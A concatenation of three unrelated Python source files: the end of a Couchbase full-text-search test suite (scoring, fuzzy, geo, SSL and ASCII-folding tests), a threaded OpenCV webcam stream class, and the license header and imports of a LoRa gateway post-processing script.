index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(5)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"disjuncts": [{"match": "Safiya", "field": "name"},
{"match": "Palmer", "field": "name"}]}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=self.sort_fields_list,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % raw_hits)
if hits:
result = index.validate_sorted_results(raw_hits,
self.sort_fields_list)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_scoring_tf_score(self):
"""
Test if the TF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"cat - a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
tf_score1, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 1 = %s" % tf_score1)
tf_score2, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 2 = %s" % tf_score2)
tf_score3, _, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("TF for Doc ID 3 = %s" % tf_score3)
self.assertTrue(tf_score1 > tf_score2 > tf_score3,
"Testcase failed. TF score for Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def compare_n1ql_fts_scoring(self, n1ql_query='', raw_hits=[]):
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
self.assertEquals(len(n1ql_results['results']), len(raw_hits),
"Return values are not the same for n1ql query and fts request.")
for res in n1ql_results['results']:
for hit in raw_hits:
if res['id'] == hit['id']:
self.assertEqual(res['score'], hit['score'],
"Scoring is not the same for n1ql result and fts request hit")
def test_scoring_idf_score(self):
"""
Test if the IDF score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a brown cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}",
"{\\\"text\\\":\\\"a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog\\\"}",
"{\\\"text\\\":\\\"a lazy dog and a brown dog\\\"}",
"{\\\"text\\\":\\\"a lazy fox and a brown fox\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, idf1, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info("IDF score for Doc ID 1 = %s" % idf1)
_, _, idf2, _, _ = index.get_detailed_scores_for_doc(doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='lazy')
self.log.info( "IDF score for Doc ID 2 = %s" % idf2)
self.assertTrue(idf1 > idf2, "Testcase failed. IDF score for Doc1 "
"for search term 'cat' not > that of search term 'lazy'")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_field_norm_score(self):
"""
Test if the Field Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, field_norm1, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 1 = %s" % field_norm1)
_, field_norm2, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 2 = %s" % field_norm2)
_, field_norm3, _, _, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='fieldWeight',
searchTerm='cat')
self.log.info(
"Field Normalization score for Doc ID 3 = %s" % field_norm3)
self.assertTrue(field_norm1 > field_norm2 > field_norm3,
"Testcase failed. Field Normalization score for "
"Doc1 not > Doc2 not > Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_query_norm_score(self):
"""
Test if the Query Normalization score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat and a brown cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, query_norm1, _ = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 1 = %s" % query_norm1)
_, _, _, query_norm2, _ = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 2 = %s" % query_norm2)
_, _, _, query_norm3, _ = index.get_detailed_scores_for_doc(
doc_id='3',
search_results=raw_hits,
weight='queryWeight',
searchTerm='cat')
self.log.info(
"Query Normalization score for Doc ID 3 = %s" % query_norm3)
self.assertTrue(query_norm1 == query_norm2 == query_norm3,
"Testcase failed. Query Normalization score for "
"Doc1 != Doc2 != Doc3")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_scoring_coord_score(self):
"""
Test if the Coord score in the Scoring functionality works fine
"""
test_data = ["{\\\"text\\\":\\\"a cat\\\"}",
"{\\\"text\\\":\\\"a lazy cat\\\"}"]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
plan_params = self.construct_plan_params()
index = self.create_index(plan_params=plan_params,
bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
self.sleep(5)
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
n1ql_query = "select search_score(d) as score, d.text, meta().id from default d where search(d," + json.dumps(query) + ")"
for index in self._cb_cluster.get_indexes():
hits, raw_hits, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
explain=True)
_, _, _, _, coord1 = index.get_detailed_scores_for_doc(
doc_id='1',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 1 = %s" % coord1)
_, _, _, _, coord2 = index.get_detailed_scores_for_doc(
doc_id='2',
search_results=raw_hits,
weight='coord',
searchTerm='')
self.log.info(
"Coord score for Doc ID 2 = %s" % coord2)
self.assertTrue(coord1 < coord2,
"Testcase failed. Coord score for Doc1 not < Doc2")
if self.run_via_n1ql:
self.compare_n1ql_fts_scoring(n1ql_query=n1ql_query, raw_hits=raw_hits)
def test_fuzzy_query(self):
"""
Test if fuzzy queries work fine
"""
test_data = [{"text":"simmer"},
{"text":"dimmer"},
{"text":"hammer"},
{"text":"shimmer"},
{"text":"rubber"},
{"text":"jabber"},
{"text":"kilmer"},
{"text":"year"},
{"text":"mumma"},
{"text":"tool stemmer"},
{"text":"he is weak at grammar"},
{"text":"sum of all the rows"}]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(bucket=self._cb_cluster.get_bucket_by_name(
'default'),
index_name="default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
if expected_hits:
zero_results_ok = False
query = eval(self._input.param("query", str(self.sample_query)))
if isinstance(query, str):
query = json.loads(query)
zero_results_ok = True
for index in self._cb_cluster.get_indexes():
hits, content, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True)
self.log.info("Docs in Search results = %s" % content)
self.log.info("Expected Docs = %s" % self.expected_docs)
if hits>0:
all_expected_docs_present = True
for doc in self.expected_docs_list:
all_expected_docs_present &= index.is_doc_present_in_query_result_content(content, doc)
self.assertTrue(all_expected_docs_present, "All expected docs not in search results")
def test_pagination_of_search_results(self):
max_matches = self._input.param("query_max_matches",10000000)
show_results_from_item = self._input.param("show_results_from_item",0)
self.load_data()
self.wait_till_items_in_bucket_equal(items = self._num_items/2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match_all": "true", "field":"name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
sort_params = self.build_sort_params()
for index in self._cb_cluster.get_indexes():
hits, doc_ids, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
sort_fields=sort_params,
show_results_from_item=show_results_from_item)
self.log.info("Hits: %s" % hits)
self.log.info("Doc IDs: %s" % doc_ids)
if hits:
self.log.info("Count of docs on page = %s" % len(doc_ids))
if (show_results_from_item >= 0 and show_results_from_item <=self._num_items):
items_on_page = self._num_items - show_results_from_item
elif show_results_from_item < 0:
items_on_page = self._num_items
show_results_from_item = 0
else:
items_on_page = 0
expected_items_on_page = min(items_on_page,max_matches)
self.assertEqual(len(doc_ids),expected_items_on_page,"Items per page are not correct")
doc_id_prefix='emp'
first_doc_id = 10000001
i = 0
expected_doc_present = True
while i < expected_items_on_page:
expected_doc_id = doc_id_prefix+str(first_doc_id+i+show_results_from_item)
expected_doc_present &= (expected_doc_id in doc_ids)
if not expected_doc_present:
self.log.info("Doc ID %s not in the search results page" % expected_doc_id)
i += 1
self.assertTrue(expected_doc_present, "Some docs not present in the results page")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_snippets_highlighting_of_search_term_in_results(self):
self.load_data()
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
index.add_child_field_to_default_mapping("name", "text")
index.add_child_field_to_default_mapping("manages.reports", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.sleep(10)
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
n1ql_results = None
if self.run_via_n1ql:
n1ql_query = "select b, search_meta(b.oouutt) as meta from default b where " \
"search(b, {\"query\": " + json.dumps(
query) + ", \"explain\": true, \"highlight\": {}},{\"out\": \"oouutt\"})"
n1ql_results = self._cb_cluster.run_n1ql_query(query=n1ql_query)
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
highlight=True,
highlight_style=self.highlight_style,
highlight_fields=self.highlight_fields_list)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
self.expected_results = json.loads(self.expected_results)
if hits:
for expected_doc in self.expected_results:
result &= index.validate_snippet_highlighting_in_result_content(
contents, expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if self.run_via_n1ql:
result &= index.validate_snippet_highlighting_in_result_content_n1ql(
n1ql_results['results'], expected_doc['doc_id'],
expected_doc['field_name'], expected_doc['term'],
highlight_style=self.highlight_style)
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
def test_geo_query(self):
"""
Tests both geo location and bounding box queries
compares results against ES
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
self.generate_random_geo_queries(geo_index, self.num_queries)
if self.run_via_n1ql:
n1ql_executor = self._cb_cluster
else:
n1ql_executor = None
self.run_query_and_compare(geo_index, n1ql_executor=n1ql_executor)
def test_sort_geo_query(self):
"""
Generate random geo location queries and compare the results against
Elasticsearch
:return: Nothing
"""
geo_index = self.create_geo_index_and_load()
from random_query_generator.rand_query_gen import FTSESQueryGenerator
testcase_failed = False
for i in range(self.num_queries):
self.log.info("Running Query no --> " + str(i))
fts_query, es_query = FTSESQueryGenerator.construct_geo_location_query()
print fts_query
print "fts_query location ---> " + str(fts_query["location"])
# If query has geo co-ordinates in form of an object
if "lon" in fts_query["location"]:
lon = fts_query["location"]["lon"]
lat = fts_query["location"]["lat"]
# If query has geo co-ordinates in form of a list
elif isinstance(fts_query["location"],list):
lon = fts_query["location"][0]
lat = fts_query["location"][1]
# If query has geo co-ordinates in form of a string or geohash
elif isinstance(fts_query["location"],str):
# If the location is in string format
if "," in fts_query["location"]:
lat = float(fts_query["location"].split(",")[0])
lon = float(fts_query["location"].split(",")[1])
else:
lat = float(Geohash.decode(fts_query["location"])[0])
lon = float (Geohash.decode(fts_query["location"])[1])
unit = fts_query["distance"][-2:]
location = None
case = random.randint(0, 3)
# Geo location as an object
if case == 0:
location = {"lon": lon,
"lat": lat}
# Geo Location as array
if case == 1:
location = [lon, lat]
# Geo Location as string
if case == 2:
location = "{0},{1}".format(lat, lon)
# Geo Location as Geohash
if case == 3:
geohash = Geohash.encode(lat, lon, precision=random.randint(3, 8))
location = geohash
print "sort_fields_location ----> " + str(location)
sort_fields = [
{
"by": "geo_distance",
"field": "geo",
"unit": unit,
"location": location
}
]
hits, doc_ids, _, _ = geo_index.execute_query(
query=fts_query,
sort_fields=sort_fields)
self.log.info("Hits from FTS: {0}".format(hits))
self.log.info("First 50 docIDs: {0}". format(doc_ids[:50]))
sort_fields_es = [
{
"_geo_distance": {
"geo": location,
"order": "asc",
"unit": unit
}
}
]
es_query["sort"] = sort_fields_es
hits2, doc_ids2, _ = self.es.search(index_name="es_index",
query=es_query)
self.log.info("Hits from ES: {0}".format(hits2))
self.log.info("First 50 doc_ids: {0}".format(doc_ids2[:50]))
if doc_ids==doc_ids2:
self.log.info("PASS: Sort order matches!")
else:
msg = "FAIL: Sort order mismatch!"
self.log.error(msg)
testcase_failed = True
self.log.info("--------------------------------------------------"
"--------------------------------------------------")
if testcase_failed:
self.fail(msg)
def test_xattr_support(self):
"""
Tests if setting includeXAttrs in index definition
breaks anything
:return: Nothing
"""
self.load_data()
index = self._cb_cluster.create_fts_index(
name='default_index',
source_name='default',
source_params={"includeXAttrs": True})
self.is_index_partitioned_balanced(index)
self.wait_for_indexing_complete()
if self._update or self._delete:
self.async_perform_update_delete(self.upd_del_fields)
if self._update:
self.sleep(60, "Waiting for updates to get indexed...")
self.wait_for_indexing_complete()
self.generate_random_queries(index, self.num_queries, self.query_types)
self.run_query_and_compare(index)
def test_ssl(self):
"""
Tests if we are able to create an index and query over ssl port
:return: Nothing
"""
fts_ssl_port=18094
import json, subprocess
idx = {"sourceName": "default",
"sourceType": "couchbase",
"type": "fulltext-index"}
qry = {"indexName": "default_index_1",
"query": {"field": "type", "match": "emp"},
"size": 10000000}
self.load_data()
cert = RestConnection(self._master).get_cluster_ceritificate()
f = open('cert.pem', 'w')
f.write(cert)
f.close()
cmd = "curl -g -k "+\
"-XPUT -H \"Content-Type: application/json\" "+\
"-u Administrator:password "+\
"https://{0}:{1}/api/index/default_idx -d ".\
format(self._master.ip, fts_ssl_port) +\
"\'{0}\'".format(json.dumps(idx))
self.log.info("Running command : {0}".format(cmd))
output = subprocess.check_output(cmd, shell=True)
if json.loads(output) == {"status":"ok"}:
query = "curl -g -k " + \
"-XPOST -H \"Content-Type: application/json\" " + \
"-u Administrator:password " + \
"https://{0}:18094/api/index/default_idx/query -d ". \
format(self._master.ip, fts_ssl_port) + \
"\'{0}\'".format(json.dumps(qry))
self.sleep(20, "wait for indexing to complete")
output = subprocess.check_output(query, shell=True)
self.log.info("Hits: {0}".format(json.loads(output)["total_hits"]))
if int(json.loads(output)["total_hits"]) != 1000:
self.fail("Query over ssl failed!")
else:
self.fail("Index could not be created over ssl")
def test_json_types(self):
import couchbase
self.load_data()
self.create_simple_default_index()
master = self._cb_cluster.get_master_node()
dic ={}
dic['null'] = None
dic['number'] = 12345
dic['date'] = "2018-01-21T18:25:43-05:00"
dic['bool'] = True
dic['string'] = "sample string json"
dic['array'] = ['element1', 1234, True]
try:
from couchbase.cluster import Cluster
from couchbase.cluster import PasswordAuthenticator
cluster = Cluster('couchbase://{0}'.format(master.ip))
authenticator = PasswordAuthenticator('Administrator', 'password')
cluster.authenticate(authenticator)
cb = cluster.open_bucket('default')
for key, value in dic.iteritems():
cb.upsert(key, value)
except Exception as e:
self.fail(e)
self.wait_for_indexing_complete()
self.validate_index_count(equal_bucket_doc_count=True)
for index in self._cb_cluster.get_indexes():
self.generate_random_queries(index, 5, self.query_types)
self.run_query_and_compare(index)
# This test is to validate if the value for score is 0 for all docs when score=none is specified in the search query.
def test_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items / 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
expected_hits=expected_hits,
return_raw_hits=True,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
result = True
if hits == expected_hits:
for doc in contents:
# Check if the score of the doc is 0.
if "score" in doc:
self.assertEqual(doc["score"], 0, "Score is not 0 for doc {0}".format(doc["id"]))
else:
self.fail("Score key not present in search results for doc {0}".format(doc["id"]))
if not result:
self.fail(
"Testcase failed. Actual results do not match expected.")
else:
self.fail("No. of hits not matching expected hits. Hits = {0}, Expected Hits = {1}".format(hits,
expected_hits))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
# This test checks the correctness of search results from queries with score=none and without score=none.
def test_result_correctness_score_none(self):
# Create bucket, create index
self.load_data()
self.wait_till_items_in_bucket_equal(items=self._num_items / 2)
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
zero_results_ok = True
expected_hits = int(self._input.param("expected_hits", 0))
default_query = {"match": "Safiya", "field": "name"}
query = eval(self._input.param("query", str(default_query)))
if expected_hits:
zero_results_ok = False
if isinstance(query, str):
query = json.loads(query)
try:
for index in self._cb_cluster.get_indexes():
hits, doc_ids_with_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False,
score="none")
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_with_score_none)
doc_ids_with_score_none.sort()
hits, doc_ids_without_score_none, _, _ = index.execute_query(query=query,
zero_results_ok=zero_results_ok,
return_raw_hits=False)
self.log.info("Hits: %s" % hits)
self.log.info("Docs: %s" % doc_ids_without_score_none)
doc_ids_without_score_none.sort()
self.assertListEqual(doc_ids_with_score_none, doc_ids_without_score_none, "Doc Ids not equal")
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
# Tests the ASCII folding filter with different types of accented characters
def test_ascii_folding_filter(self):
# Reference for test data : http://www.jarte.com/help_new/accent_marks_diacriticals_and_special_characters.html
test_data = [
{"text": "Ápple"},
{"text": "Àpple"},
{"text": "Äpple"},
{"text": "Âpple"},
{"text": "Ãpple"},
{"text": "Åpple"},
{"text": "ápple"},
{"text": "àpple"},
{"text": "äpple"},
{"text": "âpple"},
{"text": "ãpple"},
{"text": "åpple"},
{"text": "Ðodge"},
{"text": "ðodge"},
{"text": "Élephant"},
{"text": "élephant"},
{"text": "Èlephant"},
{"text": "èlephant"},
{"text": "Ëlephant"},
{"text": "ëlephant"},
{"text": "Êlephant"},
{"text": "êlephant"},
{"text": "Íceland"},
{"text": "íceland"},
{"text": "Ìceland"},
{"text": "ìceland"},
{"text": "Ïceland"},
{"text": "ïceland"},
{"text": "Îceland"},
{"text": "îceland"},
{"text": "Órange"},
{"text": "órange"},
{"text": "Òrange"},
{"text": "òrange"},
{"text": "Örange"},
{"text": "örange"},
{"text": "Ôrange"},
{"text": "ôrange"},
{"text": "Õrange"},
{"text": "õrange"},
{"text": "Ørange"},
{"text": "ørange"},
{"text": "Únicorn"},
{"text": "únicorn"},
{"text": "Ùnicorn"},
{"text": "ùnicorn"},
{"text": "Ünicorn"},
{"text": "ünicorn"},
{"text": "Ûnicorn"},
{"text": "ûnicorn"},
{"text": "Ýellowstone"},
{"text": "ýellowstone"},
{"text": "Ÿellowstone"},
{"text": "ÿellowstone"},
{"text": "Ñocturnal"},
{"text": "ñocturnal"},
{"text": "Çelcius"},
{"text": "çelcius"},
{"text": "Œlcius"},
{"text": "œlcius"},
{"text": "Šmall"},
{"text": "šmall"},
{"text": "Žebra"},
{"text": "žebra"},
{"text": "Æsthetic"},
{"text": "æsthetic"},
{"text": "Þhonetic"},
{"text": "þhonetic"},
{"text": "Discuß"},
{"text": "ÆꜴ"}
]
search_terms = [
{"term": "apple", "expected_hits": 6},
{"term": "Apple", "expected_hits": 6},
{"term": "dodge", "expected_hits": 1},
{"term": "Dodge", "expected_hits": 1},
{"term": "Elephant", "expected_hits": 4},
{"term": "elephant", "expected_hits": 4},
{"term": "iceland", "expected_hits": 4},
{"term": "Iceland", "expected_hits": 4},
{"term": "orange", "expected_hits": 6},
{"term": "Orange", "expected_hits": 6},
{"term": "unicorn", "expected_hits": 4},
{"term": "Unicorn", "expected_hits": 4},
{"term": "yellowstone", "expected_hits": 2},
{"term": "Yellowstone", "expected_hits": 2},
{"term": "nocturnal", "expected_hits": 1},
{"term": "Nocturnal", "expected_hits": 1},
{"term": "celcius", "expected_hits": 1},
{"term": "Celcius", "expected_hits": 1},
{"term": "oelcius", "expected_hits": 1},
{"term": "OElcius", "expected_hits": 1},
{"term": "small", "expected_hits": 1},
{"term": "Small", "expected_hits": 1},
{"term": "zebra", "expected_hits": 1},
{"term": "Zebra", "expected_hits": 1},
{"term": "aesthetic", "expected_hits": 1},
{"term": "AEsthetic", "expected_hits": 1},
{"term": "thhonetic", "expected_hits": 1},
{"term": "THhonetic", "expected_hits": 1},
{"term": "Discuss", "expected_hits": 1},
{"term": "AEAO", "expected_hits": 1}
]
self.create_test_dataset(self._master, test_data)
self.wait_till_items_in_bucket_equal(items=len(test_data))
index = self.create_index(
self._cb_cluster.get_bucket_by_name('default'),
"default_index")
self.wait_for_indexing_complete()
# Update index to have the child field "text"
index.add_child_field_to_default_mapping("text", "text")
index.index_definition['uuid'] = index.get_uuid()
index.update()
# Update index to have a custom analyzer which uses the ascii folding filter as a char filter
index.index_definition["params"]["mapping"]["analysis"] = {}
index.index_definition["params"]["mapping"]["analysis"] = json.loads(
"{\"analyzers\": {\"asciiff\": {\"char_filters\": [\"asciifolding\"],\"tokenizer\": \"letter\",\"type\": \"custom\" }}}")
index.index_definition["params"]["mapping"]["default_analyzer"] = "asciiff"
index.index_definition['uuid'] = index.get_uuid()
index.update()
self.wait_for_indexing_complete()
# Run queries
try:
for index in self._cb_cluster.get_indexes():
all_queries_passed = True
failed_search_terms = []
for search_term in search_terms:
self.log.info("=============== Querying for term {0} ===============".format(search_term["term"]))
query = {'match': search_term["term"], 'field': 'text'}
expected_hits = search_term["expected_hits"]
hits, contents, _, _ = index.execute_query(query=query,
zero_results_ok=True,
return_raw_hits=True)
self.log.info("Hits: %s" % hits)
self.log.info("Content: %s" % contents)
if hits != expected_hits:
all_queries_passed = False
failed_search_terms.append(search_term["term"])
self.assertTrue(all_queries_passed,
"All search terms did not return expected results. Terms for which queries failed : {0}".format(
str(failed_search_terms)))
except Exception as err:
self.log.error(err)
self.fail("Testcase failed: " + err.message)
|
webcamvideostream.py
|
# import the necessary packages
from threading import Thread
import cv2
class WebcamVideoStream:
def __init__(self, src=0, name="WebcamVideoStream", resolution=(320, 240)):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(3, int(resolution[0])) # cv2.CAP_PROP_FRAME_WIDTH
self.stream.set(4, int(resolution[1])) # cv2.CAP_PROP_FRAME_HEIGHT
(self.grabbed, self.frame) = self.stream.read()
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
self.stream.release()
# indicate that the thread should be stopped
self.stopped = True
|
post_processing_gw.py
|
#------------------------------------------------------------
# Copyright 2017 Congduc Pham, University of Pau, France.
#
# Congduc.Pham@univ-pau.fr
#
# This file is part of the low-cost LoRa gateway developped at University of Pau
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with the program. If not, see <http://www.gnu.org/licenses/>.
#
# v3.8 - image modification and need to incorporate aux_radio features
# + copy post-processing feature
#------------------------------------------------------------
# IMPORTANT NOTE
# Parts that can be modified are identified with
#////////////////////////////////////////////////////////////
# TEXT
# END
#////////////////////////////////////////////////////////////
dateutil_tz=True
import sys
import subprocess
import select
import threading
from threading import Timer
import time
from collections import deque
import datetime
try:
import dateutil.tz
except ImportError:
print "no timezone support, time will be expressed only in local time"
dateutil_tz=False
import getopt
import os
import os.path
import json
import re
import string
import base64
import requests
import libSMS
#////////////////////////////////////////////////////////////
# ADD HERE VARIABLES FOR YOUR OWN NEEDS
#////////////////////////////////////////////////////////////
